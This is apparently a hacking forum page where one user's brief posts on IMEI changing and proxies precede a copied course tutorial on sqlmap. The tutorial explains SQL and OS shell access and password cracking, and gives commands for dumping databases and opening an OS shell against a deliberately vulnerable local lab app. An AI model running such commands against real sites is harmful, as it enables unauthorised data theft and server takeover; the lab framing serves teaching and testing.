-
Posts
4 -
Joined
-
Last visited
Posts posted by Burhan
-
-
Aveți un dispozitiv fără IMEI sau doriți să schimbați recuperarea IMEI? De cele mai multe ori, nu există mai multe detalii despre ceea ce aveți nevoie. Furnizați-ne informații pentru a vă ajuta
-
They cannot access the phone number. You only have to disable some features. You can also log out of the account if you know the appropriate way for that. The new systems have some errors that can be taken advantage of.
-
The location cannot be determined because the proxy works to give an address that is random and in other countries far from your country
SQLMAP
in Programe hacking
Posted
Attackers can use the tool to get into a database, and potentially the server!
Sqlmap is capable of providing a sql shell into the database - allowing an attacker to potentially execute any arbitrary sql command.
Moreover, sqlmap also has an option to provide the attacker with an OS shell, with which the attacker can execute any arbitrary OS commands! (Sql Injection leading to Command Injection!)
Sqlmap will also try to crack user passwords when it finds hashes, using dictionary attacks - so attackers can even use this tool to get your passwords!
For defender
Defenders can use sqlmap for penetration testing of their web applications, servers, and databases.
Use the tool to crack week passwords, assess whether the database is run with restrictive privileges, and to detect any potential injection holes in the application
Options
Sqlmap is a command line tool, and just like any other unix utility, one can find all the options they need to know by simply invoking the -h flag. i.e sqlmap -h, which will display all the options the tool accepts.
Essentially, to use sqlmap, all you need to know is the url of the target web application along with the parameters to target for injection.
Here are the most common options to remember for using sqlmap:
sqlmap -u “URL?name=value" --data=“name=&name=value” --cookie=“name=value“ -f
sqlmap –u “” --users --password --privileges --roles
sqlmap –u “” --tables --columns --dump
There are numerous other options, all of which can be found here:
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Tutorial / Demo
Installation Instructions
All the demonstration are within a custom VM accesible by all students on dh2020pc00 machine.
Ex: scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER
cd /virtual/$USER
unzip CustomUbuntu804Server.zip
We will refer to $ipaddress as the ipaddress that showed up for you, for the subsequent steps.
Tutorial
Sqlmap has been installed on the custom VM that you just setup.
from terminal sqlmap -h will show the options of sqlmap.
The following tutorial uses the very vulnerably fourFours application accessible on the browser at $ipaddress/fourFours
sqlmap -u 127.0.0.1/fourFours/index.php --data="user=&password=&operation=login"
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --tables -D public
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --columns -D public -T fourfoursuser
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --dump-all
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --os-shell